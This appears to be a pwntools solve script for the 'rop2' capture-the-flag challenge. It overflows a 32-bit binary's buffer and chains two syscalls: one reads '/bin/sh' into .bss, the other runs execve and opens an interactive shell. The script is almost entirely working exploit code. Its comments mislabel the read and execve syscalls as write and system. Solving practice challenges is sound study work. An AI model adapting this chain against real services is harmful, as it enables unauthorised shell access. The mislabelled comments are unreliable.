from pwn import *
cn = remote('hackme.inndy.tw',7703)
#context.log_level='debug'
elf = ELF('rop2')
syscall = elf.symbols['syscall']
print "%x"%syscall
over = elf.symbols['overflow']
bss = elf.bss()
cn.recvuntil('Give me your ropchain:')
pay = 'a'*16
pay+= p32(syscall)#ret_addr
pay+= p32(over)#fake_ret_addr
pay+= p32(3)+p32(0)+p32(bss)+p32(8)#param
#syscall(3,0,bss,8)=write(0,bss,8)
#先往bss写入/bin/sh
cn.sendline(pay)
cn.send('/bin/sh\0')
pay='a'*16
pay+= p32(syscall)#ret_addr
pay+= 'a'*4#fake_ret_addr
pay+= p32(11)+p32(bss)+p32(0)+p32(0)#param
#syscall(11,bss,0,0)=system(bss)
cn.sendline(pay)
cn.interactive()
padding+返回地址+执行完syscall后的返回地址+参数